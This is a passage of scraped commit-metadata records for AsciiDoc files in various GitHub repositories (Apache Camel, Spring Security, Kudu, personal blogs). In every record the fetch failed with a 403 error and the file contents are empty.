cartapanis\/camel,tadayosi\/camel,chirino\/camel,driseley\/camel,nikvaessen\/camel,Fingol
finTEK\/camel,gautric\/camel,CodeSmell\/camel,pkletsko\/camel,curso007\/camel,nikhilvibhav\/camel,sverkera\/camel,jarst\/camel,NickCis\/camel,christophd\/camel,sirlatrom\/camel,borcsokj\/camel,w4tson\/camel,jkorab\/camel,adessaigne\/camel,acartapanis\/camel,pkletsko\/camel,Thopap\/camel,jonmcewen\/camel,jkorab\/camel,oalles\/camel,Thopap\/camel,YoshikiHigo\/camel,sabre1041\/camel,akhettar\/camel,tkopczynski\/camel,salikjan\/camel,anton-k11\/camel,jlpedrosa\/camel,anoordover\/camel,alvinkwekel\/camel,sabre1041\/camel,rmarting\/camel,cunningt\/camel,CodeSmell\/camel,ullgren\/camel,apache\/camel,sirlatrom\/camel,chirino\/camel,akhettar\/camel,bhaveshdt\/camel,scranton\/camel,jonmcewen\/camel,jamesnetherton\/camel,pax95\/camel,christophd\/camel,cunningt\/camel,snurmine\/camel,prashant2402\/camel,anoordover\/camel,snurmine\/camel,allancth\/camel,JYBESSON\/camel,NickCis\/camel,jarst\/camel,CodeSmell\/camel,jamesnetherton\/camel,nikhilvibhav\/camel,gilfernandes\/camel,adessaigne\/camel,neoramon\/camel,jonmcewen\/camel,allancth\/camel,lburgazzoli\/camel,FingolfinTEK\/camel,tkopczynski\/camel,nikvaessen\/camel,Fabryprog\/camel,akhettar\/camel,sverkera\/camel,akhettar\/camel,gilfernandes\/camel,Thopap\/camel,curso007\/camel,apache\/camel,lburgazzoli\/camel,yuruki\/camel,bgaudaen\/camel,w4tson\/camel,adessaigne\/camel,drsquidop\/camel,pmoerenhout\/camel,rmarting\/camel,gnodet\/camel,onders86\/camel,prashant2402\/camel,onders86\/camel,lburgazzoli\/apache-camel,anoordover\/camel,w4tson\/camel,driseley\/camel,onders86\/camel,isavin\/camel,sirlatrom\/camel,sirlatrom\/camel,neoramon\/camel,NickCis\/camel,oalles\/camel,snurmine\/camel,curso007\/camel,punkhorn\/camel-upstream,nicolaferraro\/camel,FingolfinTEK\/camel,dmvolod\/camel,pax95\/camel,jlpedrosa\/camel,pax95\/camel,jkorab\/camel,ssharma\/camel,tlehoux\/camel,adessaigne\/camel,tlehoux\/camel,jarst\/camel,isavin\/camel,sverkera\/camel,borcsokj\/camel,tadayosi\/camel,Fabryprog\/camel,isavin\/camel,pax95\/camel,jkorab\/camel,CodeSmell\/camel,scranton\/camel,pkletsko\/camel,dmvolod\/camel,objectiser\/camel,acartapanis\/camel,neoramon\/camel,zregvart\/camel,borcsokj\/camel,tdiesler\/camel,lburgazzoli\/apache-camel,RohanHart\/camel,JYBESSON\/camel,chirino\/camel,dmvolod\/camel,anton-k11\/camel,Thopap\/camel,sabre1041\/camel,apache\/camel,jkorab\/camel,jarst\/camel,driseley\/camel,gilfernandes\/camel,bgaudaen\/camel,acartapanis\/camel,pmoerenhout\/camel,bgaudaen\/camel,JYBESSON\/camel,borcsokj\/camel,rmarting\/camel,anton-k11\/camel,chirino\/camel,mcollovati\/camel,veithen\/camel,pmoerenhout\/camel,curso007\/camel,allancth\/camel,alvinkwekel\/camel,jonmcewen\/camel,zregvart\/camel,cunningt\/camel,christophd\/camel,anoordover\/camel,drsquidop\/camel,apache\/camel,jkorab\/camel,pax95\/camel,prashant2402\/camel,sabre1041\/camel,DariusX\/camel,lburgazzoli\/apache-camel,mcollovati\/camel,tadayosi\/camel,gnodet\/camel,YoshikiHigo\/camel,mcollovati\/camel,jlpedrosa\/camel,gilfernandes\/camel,allancth\/camel,veithen\/camel,pax95\/camel,lburgazzoli\/apache-camel,tlehoux\/camel,YoshikiHigo\/camel,nikhilvibhav\/camel,tdiesler\/camel,mgyongyosi\/camel,isavin\/camel,tdiesler\/camel,lburgazzoli\/apache-camel,RohanHart\/camel,alvinkwekel\/camel,JYBESSON\/camel,w4tson\/camel,punkhorn\/camel-upstream,nboukhed\/camel,nicolaferraro\/camel,ullgren\/camel,gnodet\/camel,lburgazzoli\/camel,oalles\/camel,tkopczynski\/camel,YoshikiHigo\/camel,anton-k11\/camel,NickCis\/camel","old_file":"components\/camel-stringtemplate\/src\/main\/docs\/string-template.adoc","new_file":"components\/
camel-stringtemplate\/src\/main\/docs\/string-template.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f704764f156bcc7142ed81bde9e5860e768ecbf6","subject":"y2b create post Rode Video Mic Unboxing","message":"y2b create post Rode Video Mic Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-05-30-Rode-Video-Mic-Unboxing.adoc","new_file":"_posts\/2011-05-30-Rode-Video-Mic-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3372cbe2d40dcb72b681747f74e124cf679b026f","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3445058745b124c19326e06485e642fdcbd09c0","subject":"Update 2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","message":"Update 2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","new_file":"_posts\/2017-01-12-Vulnhub-la-serie-capitulo-uno-Leave-me-here.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a35334b62a797bda5b31bedd2ca96c54e7211a4c","subject":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","message":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"253b04cb1bb97629a1134d1e4b2a4e0358b9e9de","subject":"Update 2016-07-22-Stable-Matching-Algorithm.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"dae867164842ae55c722bbc8c74e7099458bf4b6","subject":"Add common snippet common-multitenancymode","message":"Add common snippet common-multitenancymode","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-multitenancymode.adoc","new_file":"src\/main\/docs\/common-multitenancymode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fe7a22c0dc1cfd3f65d91aae9d136b8883533850","subject":"toybox has files I use to add private key to ssh-agent","message":"toybox has files I use to add private key to ssh-agent\n","repos":"0xMF\/toybox","old_file":"captain's_log.asciidoc","new_file":"captain's_log.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"b566cfae13b665e9931a905f8c2e6815f51d9454","subject":"add generated file","message":"add generated file\n","repos":"diabolicallabs\/vertx-mongo-client,diabolicallabs\/vertx-mongo-client","old_file":"vertx-mongo-client\/src\/main\/asciidoc\/dataobjects.adoc","new_file":"vertx-mongo-client\/src\/main\/asciidoc\/dataobjects.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diabolicallabs\/vertx-mongo-client.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"18066d46989a694d12492383de4dda4f65a6a04f","subject":"JUnit 5 and EE","message":"JUnit 5 and EE\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/TestingEE.adoc","new_file":"Best practices\/TestingEE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8147d24703db18e99900fe244ffb109b23236d0","subject":"Monospace-license issue","message":"Monospace-license issue\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c783eee95987e04f2b6bb68924d3dfd0fa8c22a","subject":"Update README.asciidoc","message":"Update README.asciidoc\n","repos":"xmeta\/dinzai-datni","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xmeta\/dinzai-datni.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c630ac80a7d55bc77d84f08b35049db2bb2e0098","subject":"Update 2016-02-16-All-Important-Context-Maps.adoc","message":"Update 2016-02-16-All-Important-Context-Maps.adoc","repos":"jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io,jmelfi\/jmelfi.github.io","old_file":"_posts\/2016-02-16-All-Important-Context-Maps.adoc","new_file":"_posts\/2016-02-16-All-Important-Context-Maps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/jmelfi\/jmelfi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fbc53890f43aa11340ce0ca2efedbc30ffa9b2d5","subject":"neural networks basics post","message":"neural networks basics post\n","repos":"elinep\/blog,elinep\/blog,elinep\/blog,elinep\/blog","old_file":"_posts\/2017-06-12-neural_networks_training_basics.adoc","new_file":"_posts\/2017-06-12-neural_networks_training_basics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elinep\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d5e6c450f9c110fe0043b5f6a3d21cb6d32c83d1","subject":"Update 2009-04-16-Eclipse-or-Netbeans.adoc","message":"Update 2009-04-16-Eclipse-or-Netbeans.adoc","repos":"javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io","old_file":"_posts\/2009-04-16-Eclipse-or-Netbeans.adoc","new_file":"_posts\/2009-04-16-Eclipse-or-Netbeans.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/javathought\/javathought.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5ef3943d6acf5f7589b148df4615f39db2c4f78","subject":"Update 2018-03-09-Javascript-Objectid.adoc","message":"Update 2018-03-09-Javascript-Objectid.adoc","repos":"gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io","old_file":"_posts\/2018-03-09-Javascript-Objectid.adoc","new_file":"_posts\/2018-03-09-Javascript-Objectid.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gongxiancao\/gongxiancao.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4783717b654528858cd57c1eb59b110bcac81fb","subject":"Update 2018-04-01-Why-did-you-do-that.adoc","message":"Update 2018-04-01-Why-did-you-do-that.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_file":"_posts\/2018-04-01-Why-did-you-do-that.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"610d7bcf417348498c8cc4107c8eed84988fb9ff","subject":"idp_test parameter docs","message":"idp_test parameter docs\n","repos":"rohe\/saml2test2,rohe\/saml2test2,identinetics\/saml2test2,identinetics\/saml2test2,rohe\/saml2test2,identinetics\/saml2test2,identinetics\/saml2test2,rohe\/saml2test2","old_file":"doc\/idp_test.commandline.adoc","new_file":"doc\/idp_test.commandline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/identinetics\/saml2test2.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"8c5ddc658d924c13113ffc9f97559c88ca0fd0f7","subject":"Update 2011-01-04-Unsetting-IDs-when-adding-records-in-CakePHP.adoc","message":"Update 
2011-01-04-Unsetting-IDs-when-adding-records-in-CakePHP.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2011-01-04-Unsetting-IDs-when-adding-records-in-CakePHP.adoc","new_file":"_posts\/2011-01-04-Unsetting-IDs-when-adding-records-in-CakePHP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"305ac077f6994507c1758451dcc9a5d03a0a085a","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91d70114dc9784e269a457c0304b50d195c33d1b","subject":"Update 2019-12-29-secret.adoc","message":"Update 2019-12-29-secret.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-12-29-secret.adoc","new_file":"_posts\/2019-12-29-secret.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1573318bde91bdcea665497cf1eb9e4b399205f","subject":"Create plan_alignment.adoc","message":"Create plan_alignment.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/plan_alignment.adoc","new_file":"userguide\/tutorials\/plan_alignment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"45d93099b7db693748506604bfdacc336ce13fd3","subject":"Clarify installation instructions","message":"Clarify installation instructions\n\nClarify that journal can not be empty, provide few demo transactions,\nand add example output.\n\nissue: github: #21\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>\n","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"30721c7066db8f999e399a966592e490481b621f","subject":"docs: Remove reference to old kudu-user mailing list","message":"docs: Remove reference to old kudu-user mailing list\n\nChange-Id: I2752b7988d960a24be1597906226996e7a920d4c\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/3711\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\nTested-by: Kudu 
Jenkins\n","repos":"helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7b104bff065bd52d9dd357eefc8a9fd682bbdf74","subject":"Added main readme","message":"Added main readme\n","repos":"goldmann\/docker-scripts,jpopelka\/docker-scripts,lichia\/docker-scripts,TomasTomecek\/docker-scripts,goldmann\/docker-squash","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/goldmann\/docker-squash.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c081faf6014936e5a505858265beb0fe033d23f1","subject":"SEC-2871: Polish README.adoc","message":"SEC-2871: Polish README.adoc\n","repos":"liuguohua\/spring-security,Peter32\/spring-security,caiwenshu\/spring-security,diegofernandes\/spring-security,xingguang2013\/spring-security,mounb\/spring-security,zshift\/spring-security,pwheel\/spring-security,pkdevbox\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,follow99\/spring-security,cyratech\/spring-security,mrkingybc\/spring-security,fhanik\/spring-security,thomasdarimont\/spring-security,olezhuravlev\/spring-security,djechelon\/spring-security,ajdinhedzic\/spring-security,mparaz\/spring-security,panchenko\/spring-security,pwheel\/spring-security,zhaoqin102\/spring-security,djechelon\/spring-security,panchenko\/spring-security,driftman\/spring-security,zhaoqin102\/spring-security,pwheel\/spring-security,driftman\/spring-security,likaiwalkman\/spring-security,thomasdarimont\/spring-security,spring-projects\/spring-security,wkorando\/spring-security,djechelon\/spring-security,pkdevbox\/spring-security,ollie314\/spring-security,kazuki43zoo\/spring-security,SanjayUser\/SpringSecurityPro,adairtaosy\/spring-security,forestqqqq\/spring-security,Krasnyanskiy\/spring-security,raindev\/spring-security,spring-projects\/spring-security,SanjayUser\/SpringSecurityPro,ractive\/spring-security,zhaoqin102\/spring-security,ractive\/spring-security,Peter32\/spring-security,ollie314\/spring-security,Krasnyanskiy\/spring-security,hippostar\/spring-security,liuguohua\/spring-security,chinazhaoht\/spring-security,Peter32\/spring-security,diegofernandes\/spring-security,driftman\/spring-security,jmnarloch\/spring-security,rwinch\/spring-security,eddumelendez\/spring-security,eddumelendez\/spring-security,kazuki43zoo\/spring-security,hippostar\/spring-security,follow99\/spring-security,MatthiasWinzeler\/spring-security,mparaz\/spring-security,djechelon\/spring-security,raindev\/spring-security,liuguohua\/spring-s
ecurity,olezhuravlev\/spring-security,eddumelendez\/spring-security,zgscwjm\/spring-security,diegofernandes\/spring-security,mrkingybc\/spring-security,fhanik\/spring-security,wkorando\/spring-security,MatthiasWinzeler\/spring-security,mdeinum\/spring-security,panchenko\/spring-security,fhanik\/spring-security,pwheel\/spring-security,jgrandja\/spring-security,SanjayUser\/SpringSecurityPro,SanjayUser\/SpringSecurityPro,raindev\/spring-security,adairtaosy\/spring-security,ollie314\/spring-security,likaiwalkman\/spring-security,rwinch\/spring-security,yinhe402\/spring-security,jmnarloch\/spring-security,eddumelendez\/spring-security,follow99\/spring-security,ollie314\/spring-security,mrkingybc\/spring-security,caiwenshu\/spring-security,mounb\/spring-security,pwheel\/spring-security,ajdinhedzic\/spring-security,rwinch\/spring-security,olezhuravlev\/spring-security,Xcorpio\/spring-security,thomasdarimont\/spring-security,yinhe402\/spring-security,yinhe402\/spring-security,ractive\/spring-security,thomasdarimont\/spring-security,SanjayUser\/SpringSecurityPro,zgscwjm\/spring-security,jgrandja\/spring-security,mrkingybc\/spring-security,zgscwjm\/spring-security,zhaoqin102\/spring-security,caiwenshu\/spring-security,mounb\/spring-security,likaiwalkman\/spring-security,follow99\/spring-security,diegofernandes\/spring-security,adairtaosy\/spring-security,kazuki43zoo\/spring-security,jmnarloch\/spring-security,xingguang2013\/spring-security,ajdinhedzic\/spring-security,fhanik\/spring-security,jmnarloch\/spring-security,caiwenshu\/spring-security,Krasnyanskiy\/spring-security,Xcorpio\/spring-security,forestqqqq\/spring-security,zshift\/spring-security,xingguang2013\/spring-security,eddumelendez\/spring-security,zgscwjm\/spring-security,ractive\/spring-security,Krasnyanskiy\/spring-security,olezhuravlev\/spring-security,chinazhaoht\/spring-security,pkdevbox\/spring-security,zshift\/spring-security,djechelon\/spring-security,wkorando\/spring-security,kazuki43zoo\/spring-security,chinazhaoht\/spring-security,ajdinhedzic\/spring-security,mparaz\/spring-security,mdeinum\/spring-security,hippostar\/spring-security,MatthiasWinzeler\/spring-security,rwinch\/spring-security,likaiwalkman\/spring-security,Peter32\/spring-security,mdeinum\/spring-security,mdeinum\/spring-security,zshift\/spring-security,fhanik\/spring-security,MatthiasWinzeler\/spring-security,jgrandja\/spring-security,raindev\/spring-security,wkorando\/spring-security,fhanik\/spring-security,xingguang2013\/spring-security,thomasdarimont\/spring-security,cyratech\/spring-security,adairtaosy\/spring-security,cyratech\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,forestqqqq\/spring-security,mparaz\/spring-security,rwinch\/spring-security,olezhuravlev\/spring-security,cyratech\/spring-security,chinazhaoht\/spring-security,pkdevbox\/spring-security,driftman\/spring-security,spring-projects\/spring-security,forestqqqq\/spring-security,hippostar\/spring-security,Xcorpio\/spring-security,kazuki43zoo\/spring-security,liuguohua\/spring-security,jgrandja\/spring-security,Xcorpio\/spring-security,mounb\/spring-security,panchenko\/spring-security,jgrandja\/spring-security,yinhe402\/spring-security,spring-projects\/spring-security,rwinch\/spring-security","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmnarloch\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"a5ef24be545575bee5457e08d3e1518454033ebb","subject":"Added serialization dataformat docs to Gitbook","message":"Added serialization dataformat docs to Gitbook\n","repos":"davidkarlsen\/camel,sirlatrom\/camel,pmoerenhout\/camel,objectiser\/camel,Thopap\/camel,onders86\/camel,alvinkwekel\/camel,alvinkwekel\/camel,rmarting\/camel,pkletsko\/camel,bhaveshdt\/camel,DariusX\/camel,nicolaferraro\/camel,tlehoux\/camel,kevinearls\/camel,zregvart\/camel,jarst\/camel,snurmine\/camel,anton-k11\/camel,anoordover\/camel,onders86\/camel,sabre1041\/camel,pax95\/camel,tkopczynski\/camel,onders86\/camel,drsquidop\/camel,dmvolod\/camel,Fabryprog\/camel,davidkarlsen\/camel,lburgazzoli\/camel,dmvolod\/camel,nboukhed\/camel,hqstevenson\/camel,pmoerenhout\/camel,w4tson\/camel,acartapanis\/camel,akhettar\/camel,sverkera\/camel,dmvolod\/camel,chirino\/camel,chirino\/camel,jkorab\/camel,DariusX\/camel,adessaigne\/camel,bhaveshdt\/camel,Fabryprog\/camel,jkorab\/camel,pax95\/camel,ullgren\/camel,anton-k11\/camel,jonmcewen\/camel,NickCis\/camel,adessaigne\/camel,neoramon\/camel,sirlatrom\/camel,hqstevenson\/camel,gnodet\/camel,anton-k11\/camel,tlehoux\/camel,sverkera\/camel,tdiesler\/camel,alvinkwekel\/camel,tkopczynski\/camel,drsquidop\/camel,NickCis\/camel,rmarting\/camel,jonmcewen\/camel,neoramon\/camel,apache\/camel,christophd\/camel,acartapanis\/camel,jamesnetherton\/camel,acartapanis\/camel,hqstevenson\/camel,lburgazzoli\/apache-camel,drsquidop\/camel,chirino\/camel,pkletsko\/camel,pmoerenhout\/camel,jonmcewen\/camel,chirino\/camel,nikhilvibhav\/camel,veithen\/camel,punkhorn\/camel-upstream,w4tson\/camel,chirino\/camel,sabre1041\/camel,driseley\/camel,curso007\/camel,cunningt\/camel,w4tson\/camel,yuruki\/camel,kevinearls\/camel,tdiesler\/camel,nikhilvibhav\/camel,dmvolod\/camel,snurmine\/camel,sverkera\/camel,prashant2402\/camel,davidkarlsen\/camel,RohanHart\/camel,mcollovati\/camel,CodeSmell\/camel,driseley\/camel,gautric\/camel,tadayosi\/camel,lburgazzoli\/apache-camel,sirlatrom\/camel,neoramon\/camel,nicolaferraro\/camel,onders86\/camel,JYBESSON\/camel,akhettar\/camel,jarst\/camel,pkletsko\/camel,snurmine\/camel,nikhilvibhav\/camel,gautric\/camel,yuruki\/camel,punkhorn\/camel-upstream,prashant2402\/camel,bhaveshdt\/camel,jonmcewen\/camel,DariusX\/camel,allancth\/camel,w4tson\/camel,CodeSmell\/camel,JYBESSON\/camel,mgyongyosi\/camel,ssharma\/camel,ssharma\/camel,akhettar\/camel,allancth\/camel,ssharma\/camel,pax95\/camel,sirlatrom\/camel,apache\/camel,jkorab\/camel,drsquidop\/camel,scranton\/camel,pax95\/camel,nboukhed\/camel,curso007\/camel,tlehoux\/camel,tlehoux\/camel,RohanHart\/camel,NickCis\/camel,kevinearls\/camel,CodeSmell\/camel,rmarting\/camel,snurmine\/camel,mcollovati\/camel,chirino\/camel,punkhorn\/camel-upstream,akhettar\/camel,Thopap\/camel,RohanHart\/camel,lburgazzoli\/camel,onders86\/camel,objectiser\/camel,isavin\/camel,prashant2402\/camel,christophd\/camel,tdiesler\/camel,gnodet\/camel,snurmine\/camel,bgaudaen\/camel,objectiser\/camel,tlehoux\/camel,cunningt\/camel,gilfernandes\/camel,lburgazzoli\/apache-camel,driseley\/camel,anoordover\/camel,mcollovati\/camel,anoordover\/camel,adessaigne\/camel,dmvolod\/camel,onders86\/camel,alvinkwekel\/camel,rmarting\/camel,sabre1041\/camel,allancth\/camel,gilfernandes\/camel,veithen\/camel,bhaveshdt\/camel,Fabryprog\/camel,pax95\/camel,ullgren\/camel,isavin\/camel,lburgazzoli\/camel,lburgazzoli\/camel,tdiesler\/camel,prashant2402\/camel,jamesnetherton\/camel,pkletsko\/camel,christophd\/camel,scranton\/camel,gautric\/camel,jarst\/camel,nicolaferr
